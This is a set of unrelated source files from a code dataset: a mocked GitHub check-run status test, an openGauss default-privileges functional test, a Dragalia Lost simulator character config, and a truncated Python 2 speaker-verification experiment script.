title='Test Check', summary='Test Finished', annotations=[]
)
status_check.update_status_check(
id=9, conclusion=status_check.StatusConclusion.SUCCESS,
github_token='<PASSWORD>', repo='ammaraskar/sphinx-action',
check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/9', # noqa
headers={
'Authorization': 'Bearer <PASSWORD>Token2',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'status': 'completed',
'completed_at': mock.ANY,
'conclusion': 'success',
'output': {
'title': 'Test Check',
'summary': 'Test Finished',
'annotations': []
}
}
)
@mock.patch('sphinx_action.status_check.requests.patch')
def test_finish_status_check_fail(self, mock_patch):
mock_response = mock.NonCallableMock(requests.Response)
mock_response.status_code = 200
mock_patch.return_value = mock_response
annotations = [
status_check.CheckAnnotation(
path='Doc/using/index.rst', start_line=3, end_line=3,
annotation_level=status_check.AnnotationLevel.WARNING,
message='Unexpected section title.'
),
status_check.CheckAnnotation(
path='Doc/distutils/disclaimer.rst', start_line=1, end_line=1,
annotation_level=status_check.AnnotationLevel.FAILURE,
message=':ref:`asdf` not found.'
)
]
check_output = status_check.CheckOutput(
title='Test Check', summary='Test Failed', annotations=annotations
)
status_check.update_status_check(
id=32, conclusion=status_check.StatusConclusion.FAILURE,
github_token='<PASSWORD>', repo='ammaraskar/sphinx-action',
check_output=check_output
)
mock_patch.assert_called_once_with(
'https://api.github.com/repos/ammaraskar/sphinx-action/check-runs/32', # noqa
headers={
'Authorization': 'Bearer <PASSWORD>',
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.antiope-preview+json',
'User-Agent': 'sphinx-action'
},
json={
'completed_at': mock.ANY,
'conclusion': 'failure',
'status': 'completed',
'output': {
'title': 'Test Check',
'summary': 'Test Failed',
'annotations': [
{
'path': 'Doc/using/index.rst',
'start_line': 3, 'end_line': 3,
'annotation_level': 'warning',
'message': 'Unexpected section title.'
},
{
'path': 'Doc/distutils/disclaimer.rst',
'start_line': 1, 'end_line': 1,
'annotation_level': 'failure',
'message': ':ref:`asdf` not found.'
}
]
}
}
)
create_response = json.loads("""
{
"id": 4,
"head_sha": "ce587453ced02b1526dfb4cb910479d431683101",
"node_id": "MDg6Q2hlY2tSdW40",
"external_id": "42",
"url": "https://api.github.com/repos/github/hello-world/check-runs/4",
"html_url": "http://github.com/github/hello-world/runs/4",
"details_url": "https://example.com",
"status": "in_progress",
"conclusion": null,
"started_at": "2018-05-04T01:14:52Z",
"completed_at": null,
"output": {
"title": "Mighty Readme Report",
"summary": "",
"text": ""
},
"name": "mighty_readme",
"check_suite": {
"id": 5
},
"app": {
"id": 1,
"node_id": "MDExOkludGVncmF0aW9uMQ==",
"owner": {
"login": "github",
"id": 1,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjE=",
"url": "https://api.github.com/orgs/github",
"repos_url": "https://api.github.com/orgs/github/repos",
"events_url": "https://api.github.com/orgs/github/events",
"hooks_url": "https://api.github.com/orgs/github/hooks",
"issues_url": "https://api.github.com/orgs/github/issues",
"members_url": "https://api.github.com/orgs/github/members{/member}",
"avatar_url": "https://github.com/images/error/octocat_happy.gif",
"description": "A great organization"
},
"name": "Super CI",
"description": "",
"external_url": "https://example.com",
"html_url": "https://github.com/apps/super-ci",
"created_at": "2017-07-08T16:18:44-04:00",
"updated_at": "2017-07-08T16:18:44-04:00"
},
"pull_requests": []
}""")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1666
|
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : Functional test
Case Name : The initial user and a sysadmin user alter their own privileges
Description :
1.The initial user alters its own privileges: alter reports no error but does not take effect; the queried privileges are unchanged
1.1.The initial user alters its own privileges
1.2.Clean up the environment Expectation: cleanup succeeds
2.A sysadmin user alters its own privileges: alter reports no error but does not take effect; the queried privileges are unchanged
2.1.Connect as an administrator and create sysadmin user default016_01 Expectation: creation succeeds
2.2.Connect as user default016_01 and run the alter tests
2.3.Clean up Expectation: cleanup succeeds
Note: the alter tests above cover privileges on tables (including views), types and functions
Expect :
1.The initial user alters its own privileges: alter reports no error but does not take effect; the queried privileges are unchanged
1.1.The initial user alters its own privileges
1.2.Clean up the environment Expectation: cleanup succeeds
2.A sysadmin user alters its own privileges: alter reports no error but does not take effect; the queried privileges are unchanged
2.1.Connect as an administrator and create sysadmin user default016_01 Expectation: creation succeeds
2.2.Connect as user default016_01 and run the alter tests
2.3.Clean up Expectation: cleanup succeeds
Note: the alter tests above cover privileges on tables (including views), types and functions
History :
"""
import sys
import unittest
from yat.test import macro
from yat.test import Node
sys.path.append(sys.path[0] + "/../")
from testcase.utils.Logger import Logger
from testcase.utils.Constant import Constant
from testcase.utils.CommonSH import CommonSH
logger = Logger()
commonsh = CommonSH('dbuser')
class Privategrant(unittest.TestCase):
def setUp(self):
logger.info('--------Opengauss_Function_Alter_Default_Privileges_Case0016 execution starts--------')
self.userNode = Node('dbuser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.Constant = Constant()
# username of the initial user
self.username = self.userNode.ssh_user
# password of the initial user
self.password = <PASSWORD>
def test_common_user_permission(self):
logger.info('--------1.The initial user alters its own privileges--------')
logger.info('--------1.1.The initial user alters its own privileges--------')
sql_cmd = (f'''
drop schema if exists schema_016 cascade;
create schema schema_016;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on tables to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT select,insert,update,truncate,references,TRIGGER,DELETE on tables to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on functions to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT EXECUTE on functions to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on TYPES to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT USAGE on TYPES to {self.username} WITH GRANT OPTION ;
drop schema if exists schema_016 cascade;
create schema schema_016;
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id int unique);
select * from test_alter_default_016;
drop function if exists test_default_016(int) cascade;
create or replace function test_default_016(a int) return int
as
b int:= a;
begin
for i in 1..a loop
b:=b+1;
end loop;
return b;
end;
select test_default_016(16);
drop type if exists type016;
CREATE TYPE type016 AS (c_int int,c_text text);
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id type016);
select * from test_alter_default_016;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on tables from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke select,insert,update,truncate,references,TRIGGER,DELETE on tables from {self.username} CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on functions from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke EXECUTE on functions from {self.username} CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on TYPES from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke USAGE on TYPES from {self.username} CASCADE CONSTRAINTS;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U {self.username} -W {self.password} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
self.assertIn(self.Constant.ALTER_DEFAULT_PRIVILEGES, msg)
logger.info('--------1.2.Clean up the environment--------')
sql_cmd = ('''
drop table if exists test_alter_default_016 cascade;
drop type if exists type016 cascade;
drop function if exists test_default_016(int) cascade;
drop schema if exists schema_016 cascade;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U {self.username} -W {self.password} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
logger.info('--------2.A sysadmin user alters its own privileges--------')
logger.info('--------2.1.Connect as an administrator and create sysadmin user default016_01 --------')
sql_cmd = commonsh.execut_db_sql(f'''
drop owned by default016_01 cascade;
drop user if exists default016_01;
create user default016_01 password '{<PASSWORD>}';
grant all privileges to default016_01;
''')
logger.info(sql_cmd)
self.assertIn(self.Constant.CREATE_ROLE_SUCCESS_MSG, sql_cmd)
logger.info('--------2.2.Connect as user default016_01 and run the alter tests--------')
sql_cmd = (f'''
drop schema if exists schema_016 cascade;
create schema schema_016;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on tables to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT select,insert,update,truncate,references,TRIGGER,DELETE on tables to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on functions to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT EXECUTE on functions to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on TYPES to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT USAGE on TYPES to default016_01 WITH GRANT OPTION ;
drop schema if exists schema_016 cascade;
create schema schema_016;
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id int unique);
select * from test_alter_default_016;
drop function if exists test_default_016(int) cascade;
create or replace function test_default_016(a int) return int
as
b int:= a;
begin
for i in 1..a loop
b:=b+1;
end loop;
return b;
end;
select test_default_016(16);
drop type if exists type016;
CREATE TYPE type016 AS (c_int int,c_text text);
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id type016);
select * from test_alter_default_016;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on tables from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke select,insert,update,truncate,references,TRIGGER,DELETE on tables from default016_01 CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on functions from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke EXECUTE on functions from default016_01 CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on TYPES from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke USAGE on TYPES from default016_01 CASCADE CONSTRAINTS;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U default016_01 -W {macro.COMMON_PASSWD} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
self.assertIn(self.Constant.ALTER_DEFAULT_PRIVILEGES, msg)
logger.info('--------2.3.Clean up--------')
sql_cmd = commonsh.execut_db_sql(f'''
drop owned by default016_01 cascade;
drop user if exists default016_01;
''')
logger.info(sql_cmd)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], sql_cmd)
def tearDown(self):
logger.info('----------------------------------Clean up the environment----------------------------------')
sql_cmd = commonsh.execut_db_sql('''
drop owned by default016_01 cascade;
drop user if exists default016_01;
''')
logger.info(sql_cmd)
logger.info('--------Opengauss_Function_Alter_Default_Privileges_Case0016 execution finished--------')
|
StarcoderdataPython
|
188425
|
<filename>adv/pinon.py
import sys

from core.advbase import *
from module.template import SigilAdv
def module():
return Pinon
class Pinon(SigilAdv):
conf = {}
conf['slots.a'] = ['Primal_Crisis', 'His_Clever_Brother']
conf['slots.d'] = 'Dragonyule_Jeanne'
conf['acl'] = """
# `dragon(c3-s-end), s
`s3, not buff(s3)
if self.unlocked
if x=8 or fsc
`s2
`s4
`s1, self.energy()>=5
end
else
if fsc
`s2
`s4
`s1
`dodge
end
`fs2
end
"""
conf['coabs'] = ['Dagger2', 'Axe2', 'Xander']
conf['share'] = ['Gala_Elisanne']
def fs2_proc(self, e):
self.a_update_sigil(-13)
def prerun(self):
self.config_sigil(duration=300, x=True)
def x(self):
x_min = 1
prev = self.action.getprev()
if self.unlocked and isinstance(prev, X) and prev.index >= 5:
x_min = 8
return super().x(x_min=x_min)
def post_run(self, end):
if self.unlocked:
self.comment += f'unlock at {self.unlocked:.02f}s; only s1 if energized after unlock'
else:
self.comment += f'not unlocked'
if __name__ == '__main__':
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
|
StarcoderdataPython
|
1743967
|
import pandas as pd #for pandas see http://keisanbutsuriya.hateblo.jp/entry/201\
import argparse
import numpy as np
import math
import subprocess
import glob
import mylib
import time
import datetime
import sys
import os
# main
def myshell(cmd): # do not stop even when an error occurred
try:
retcode=subprocess.Popen(cmd, shell=True)
if retcode < 0:
print "my Child was terminated by signal", -retcode
else:
pass
# print "my Child returned", retcode
except OSError as e:
print "Execution failed:", cmd, e
return retcode.wait()
def m_st(i_s,i_t): #
if verif=="s":
return i_s #for speaker recog
else:
return i_t #for speaker recog
#old#def vrv2_f(f): # old
#old# fl=f.split('-')
#old# import pdb;pdb.set_trace(); #for debug
#old## MFCC f=mnh-go1-R1-sCns120.dat #2210617
#old## LPCSE f=mnh-go1-R1-sCns120.dat #2210617
#old## CAN2 f=mnh-go1-R1-pP1F2x23G3x0.5m0.dat
#old# if fl[-2][0]=='C': #LPC #mnh-go1-R1-MFCCl20m20n22E1.dat
#old# if verif=="s": #speaker
#old# v=fl[0]
#old# if len(fl)==5: #e.g. mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
#old# r='1'
#old# v2=v #-> mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
#old# elif len(fl)==7:
#old# r=fl[4][1:]
#old# v2=fl[2]
#old# else:# if verif=="t": #text
#old# v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
#old# if len(fl)==5:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==7:
#old# r=fl[4][1:]
#old# v2=fl[3][:-1] if fl[3][-2].isdigit()==False else fl[3][:-2]
#old#
#old# else:#pole-distribution
#old# if verif=="s": #speaker
#old# v=fl[0]
#old# if len(fl)==4:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==6: #e.g. ['fms', 'si9', 'R0.8', 'mkk', 'kyu1', 20201224
#old## elif len(fl)==6: #e.g. ['fms', 'si9', 'R0.8', 'mkk', 'kyu1', 'pP1F2x23G3x0.5m0.dat']fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# r=fl[2][1:]
#old# v2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# #20200910? s2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# else:#verif=t text
#old# v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
#old# if len(fl)==4:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==6: #e.g. fhs-go1-mmt-nana10-R0.8-pP1F4x24G3x0.5m0.dat
#old# r=fl[4][1:]
#old# v2=fl[3][:-1] if fl[3][-2].isdigit()==False else fl[3][:-2]
#old# #20200910? s2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# return v,r,v2
def vrv2_f(f): # new 20210617
fl=f.split('-')
# MFCC f=mnh-go1-R1-sCns120.dat #20210617
# LPCSE f=mnh-go1-R1-sCns120.dat #20210617
# CAN2 f=mnh-go1-R1-pP1F2x23G3x0.5m0.dat
# y=fhs-zero1-R0.8-mko-go7.dat
# import pdb;pdb.set_trace(); #for debug
if verif=="s": #speaker verification
v=fl[0]
# import pdb;pdb.set_trace(); #for debug
if fl[3]=='R1':#e.g. mym-kyu10-R1-p.dat
r='1'
v2=fl[0] #-> mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
else:#R=0.8, ...
r=fl[2][1:]
v2=fl[3] # y=fhs-zero1-R0.8-mko-go7.dat
else:# if verif=="t": #text verification
if fl[3]=='R1':#e.g. mym-kyu10-R1-p.dat
r='1'
v2=v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
else:
r=fl[3][1:] # y=fhs-zero1-R0.8-mko-go7.dat
v2=fl[4][:-1] if fl[4][-2].isdigit()==False else fl[4][:-2]
return v,r,v2
if __name__ == "__main__":
#oob4speakerdigit+sX_2018 sp:fhs:fms tx:zero:ichi ntxi:9 k:36 mbas:$mbas dir:$dir1 dir2:$dir2 s:-1 N:${N} sX:${sX}
#oob4speakerdigit+ sp:fhs:fms:mkk:mko:mmt:mnh:mym tx:zero:ichi:ni:san:yon:go:roku:nana:hachi:kyu ntxi:10 k:36 mbas:2:300:1.6:1 dir:$dira s:-1 N:40
parser = argparse.ArgumentParser(description='speech normalize')
parser.add_argument('-ntxi', default=10, type=int, help='number of texts')
parser.add_argument('-k', default=36, type=int, help='embedding dimension k')
parser.add_argument('-N', default=40, type=int, help='number of units for verification')
parser.add_argument('-mbas', default='2:300:1.6:1', type=str, help='mbas:2:nbag:bagsize_ratio:1')
parser.add_argument('-s', default=0, type=int, help='-1 for all speaker verification')
parser.add_argument('-d', default=0, type=int, help='-1 for all digit verification')
parser.add_argument('-sd', default='', type=str, help='s and d, respectively, for speaker and digit verification')
parser.add_argument('-w', default=0, type=int, help='-1 for all digit (word) verification')
parser.add_argument('-sX', default=-1, type=int, help='excluded speaker')
parser.add_argument('-dr', default='.', type=str, help='directory of training data')
parser.add_argument('-R', default='0.8', type=str, help='mag r1:r2:...:rn for learning and test')
parser.add_argument('-RX', default='0', type=str, help='mag r1:r2:...:rn for test')
parser.add_argument('-FD', default='pP1', type=str, help='Features of data')
# parser.add_argument('-FD', default='pP1', type=str, choices=['pP1','pPc','pPcb','rP1','rPc','rPcb','s','S','sR','SR','SC','sC'],help='Features of data')
# parser.add_argument('-kl', default='k20l20', type=str, help='k:LPC dimension, fl flame-length[ms] ')
parser.add_argument('-nr', default=2, type=int, help='number of divisions for magnitude-axis in pole space')
parser.add_argument('-na', default=18, type=int, help='number of divisions for angle-axis in pole space')
parser.add_argument('-ns', default=100, type=int, help='number of divisions for spectrum envelope')
parser.add_argument('-ls', default='00', type=str, help='use log-scale or not, 10: log before mean, 01 log after mean, 00 no-log')
parser.add_argument('-lx', default='0', type=str, help='use log-scale or not, 1: log , 0 no-log')
# parser.add_argument('-ls', default=1, type=int, help='use log-scale or not')
parser.add_argument('-nx', default=7, type=int, help='number of divisions on x-axis in pole space')
parser.add_argument('-nG', default=13, type=int, help='Gaussian Kernel size')
parser.add_argument('-sG', default=2, type=float, help='Gaussian Kernel sigma')
parser.add_argument('-OmL', default='0', type=str, help='Omit Learning')
parser.add_argument('-ow', default=1, type=int, help='Overwrite files if ow=1, omit otherwise.')
parser.add_argument('-mel', default=0, type=int, help='1 for use mel frequency.')
parser.add_argument('-DISP', default='1', type=str, help='DISP[0]==1 to make files, DISP[1]==1 to display')
parser.add_argument('-nlz', default='1', type=str, choices=['max','norm','1','none'], help='normalize by norm, max, 1')
parser.add_argument('-fnerr', default='mmt-san2:fhs-hachi5', type=str, help='files lacking data')
parser.add_argument('-AF', default='_', type=str, help='AF=(dr/FDext) of Additional Features for training')
parser.add_argument('-AFcut', default='', type=str, help='ex. -AFcut 23-46:0-1')
parser.add_argument('-method', default='CAN2,8,50,2:0.7:1:20', type=str, help='method for making M or s')
parser.add_argument('-sp', default='fhs:fms:mkk:mko:mmt:mnh:mym', type=str, help='speaker')
parser.add_argument('-tx', default='zero:ichi:ni:san:si:go:roku:nana:hachi:kyu', type=str, help='text')
parser.add_argument('-S', default='fhs:fms:mkk:mko:mmt:mnh:mym', type=str, help='speaker')
parser.add_argument('-D', default='zero:ichi:ni:san:si:go:roku:nana:hachi:kyu', type=str, help='text')
parser.add_argument('-L', default='1:2:3:4:5:6:7:8:9', type=str, help='datetime index')
# parser.add_argument('-drFD2', default='', type=str, help='drFD2(dr/FDext) of Additional Features for training ')
# parser.add_argument('-fn4AF', default='', type=str, help='fn4 Additional Features for training')
np.random.seed(seed=32)
args = parser.parse_args()
S=(args.sp).split(':') #speakers
T=(args.tx).split(':') #text
S=(args.S).split(':') #speakers
D=(args.D).split(':') #speakers
L=(args.L).split(':') #speakers
R=(args.R).split(':') #lamgda:SN ratio
RX=(args.RX).split(':') #lambda:SN ratio for test
L=(args.L).split(':') #text
sX=args.sX
dr=args.dr
nr=args.nr
na=args.na
nx=args.nx
nG=args.nG
sG=args.sG
# FD=(args.FD).split('_')
FD=args.FD
mel=args.mel
N=args.N
DISP=args.DISP+'00000'
# L=range(1,args.ntxi+1) #date
_mbas=map(float,(args.mbas).split(':'))
mbas=[]
mbas.append(int(_mbas[0]))
mbas.append(int(_mbas[1]))
mbas.append(float(_mbas[2]))
mbas.append(int(_mbas[3]))
b=mbas[1] #method,b,a,seed=map(int,(args.mbas).split(':'))
fntrain_check=0 #for check target to debug
fnerr=(args.fnerr).split(':') #fnerr=['mmt-san2', 'fhs-hachi5']
if args.s != 0:# speaker-verification
M=S
V=S
verif="s"
elif args.d != 0: #digit(text)-verification
M=T
V=T
verif="t"
if args.sd =='s':
M=S
V=S
verif="s"
elif args.sd =='d':
M=T
V=T
verif="t"
else:pass
# import pdb;pdb.set_trace(); #for debug
# fnr=args.dir+'/speaker-verif-result-R{}{}.dat'.format(args.R,args.FD)
# if nRX>0: fnrX=args.dir+'/speaker-verif-result-X-R{}{}.dat'.format(args.R,args.FD)
method=(args.method).split(',')
if method[0][:4]=='MFCC':
l,m,n,E,N=method[1:][0:5] #method=MFCC,${l},${n_MFCC},${n_MFCCFB},${E_MFCC}
E_MFCC=int(E)
FD=''
FDext='MFCC' # FDext='{}F{}'.format(FD,nx)
FDextr='MFCCl{}m{}n{}E{}N{}b{}a{}R{}'.format(l,m,n,E,N,b,_mbas[2],args.R) # FDext='{}F{}'.format(FD,nx)
# import pdb;pdb.set_trace(); #for debug
elif method[0][:6]=='LPCSE1':#new20210818
k,l,n,N=map(int,method[1:][0:4])
FDext='SE' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='SEk{}l{}n{}N{}b{}a{}R{}'.format(k,l,n,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:7]=='LPCSPTK':#new20210818
# k,l,ns,N=map(int,method[1:][0:5])
k,l,n,w=map(int,method[1:][0:4])
FDext='SE' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='SEk{}l{}n{}w{}N{}b{}a{}R{}'.format(k,l,n,w,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDextr='SEk{}l{}f{}w{}'.format(k,l,f,w) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:6]=='LPCSE1':
k,l,ns,N=map(int,method[1:][0:5])
FDext='LPCSE1' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='LPCSE1k{}l{}n{}N{}b{}a{}R{}'.format(k,l,ns,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0]=='N':
N=int(method[1])
FDext='N' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='N{}'.format(N) #
else:
if method[0][:6]=='LPC+SE':
k,l,FD,ns=method[1:][0:4]
mname='LPC+SE'
# FDex='LPC+SE'.format(k,l,FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDextr='LPC+SEk{}l{}FD{}ns{}'.format(k,l,FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDext='{}ns{}'.format(FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:7]=='CAN2+PD':
# import pdb;pdb.set_trace(); #for debug
k1,N1,a1,b1,s1,FD,nr,na,nG,sG,mel,N,a,b,s=method[1:][0:15]
rsa='2:{}:{}:{}'.format(a,s,b)
# k,N,rsa,nr,na,nG,sG,mel=method[1:][0:8]
mname='CAN2+PD'
# FDext='{}F{}x{}G{}x{}m{}'.format(FD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# # FDext='CAN2+PDk{}N{}rsa{}nr{}na{}nG{}mel{}'.format(k,N,rsa,nr,na,nG,sG,melFD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# FDextr='CAN2+PDk{}N{}rsa{}nr{}na{}nG{}mel{}'.format(k,N,rsa,nr,na,nG,sG,melFD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# FDextr='{}N{}a{}b{}{}N{}R{}'.format(mname,N1,a1,b1,FDext,N,b,_mbas[2],args.R)
if FD[0]=='r':
FDext='{}F{}G{}x{}'.format(FD,nx,nG,sG) # FDext='{}F{}'.format(FD,nx)
elif FD[0]=='p':
FDext='{}F{}x{}G{}x{}m{}'.format(FD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
elif FD[0] in ('s', 'S'):
FDext='{}ns{}ls{}'.format(FD,args.ns,args.ls) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# elif FD[0] in ('s', 'S','sR', 'SR'):
# FDext='FD{}ns{}ls{}'.format(FD,args.ns,args.ls) # FDext='{}F{}x{}'.format(FD,nr,na)
else:pass
if method[0][:7]=='CAN2+PD':
FDextr='{}N{}a{}b{}{}N{}R{}'.format(mname,N1,a1,b1,FDext,N,b,_mbas[2],args.R)
# FDextr='{}{}N{}b{}a{}R{}'.format(mname,FDext,N,b,_mbas[2],args.R)
else:
FDextr='{}{}N{}R{}'.format(mname,FDext,N,b,_mbas[2],args.R)
fnr='{}/result-R{}{}.dat'.format(dr,args.R,FDextr)
nRX=len(RX) if RX[0]!='0' else 0
if nRX>0: fnrX='{}/resultX-R{}{}.dat'.format(dr,args.R,FDextr)
fpr=open(fnr,'w')
if nRX>0: fprX=open(fnrX,'w')
nS=len(S)
nL=len(L)
nT=len(T)
# import pdb;pdb.set_trace(); #for debug
argv=sys.argv
cmd=''
for a in argv:# for i,a in enumerate(argv):
cmd+=a+' '
# print('#start:python {}'.format(cmd))
cmd0=cmd
start_time=time.time()
print('#start time:{}'.format(datetime.datetime.now()))
# import pdb;pdb.set_trace(); #for debug
AF=[]
if args.AF != '_' and args.AF != 'q':
aAF=(args.AF).split(':') # aAF=trainingFile,weight,del0-del1
for i in range(0,len(aAF)): #
aAFi=aAF[i].split(',')
# import pdb;pdb.set_trace(); #for debug
if len(aAFi)>=3:
aAFdel=aAFi[2].split('-')
if aAFdel[0]=='':
AFdel=''
elif len(aAFdel)==1:
AFdel=[int(aAFdel[0]),int(aAFdel[0])+1]
elif len(aAFdel)==2:
AFdel=[int(aAFdel[0]),int(aAFdel[1])]
else:
AFdel=''
AF.append([os.path.expanduser(aAFi[0]),float(aAFi[1]),AFdel])
elif len(aAFi)>=2:
AF.append([os.path.expanduser(aAFi[0]),float(aAFi[1]),''])
else:
AF.append([os.path.expanduser(aAFi[0]),1,''])
# aAFcut=args.AFcut.split(':') #-AFcut 23-46:0:0
# AFcut={}
# for i in range(0,len(aAFcut)):
# AFcuti=aAFcut[i].split('-')
# if AFcuti[0]=='':
# AFcut[i]=''
# elif len(AFcuti)==1:
# AFcut[i]=[int(AFcuti[0]),int(AFcuti[0])+1]
# elif len(AFcuti)==2:
# AFcut[i]=[int(AFcuti[0]),int(AFcuti[1])]
# else:
# AFcut[i]=''
# for i in range(len(aAFcut),len(AF)):
# AFcut[i]=''
# import pdb;pdb.set_trace(); #for debug
# import pdb;pdb.set_trace(); #for debug
if len(AF)>0:
# if args.AF != '_' and args.AF != 'q':
fbtrain='train_xy'
# AF=map(os.path.expanduser,(args.AF).split(':'))
# import pdb;pdb.set_trace(); #for debug
## FtrainAF=np.array(pd.read_csv(AF[0],delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
## import pdb;pdb.set_trace(); #for debug
## if AFcut[0]!='':
## FtrainAF=np.delete(FtrainAF,range(AFcut[0][0],AFcut[0][1]),1)
# FtrainAF=np.array(pd.read_csv('{}'.format(AF[0]),delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
for i in range(0,len(AF)):
FtrainAF1=np.array(pd.read_csv(AF[i][0],delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
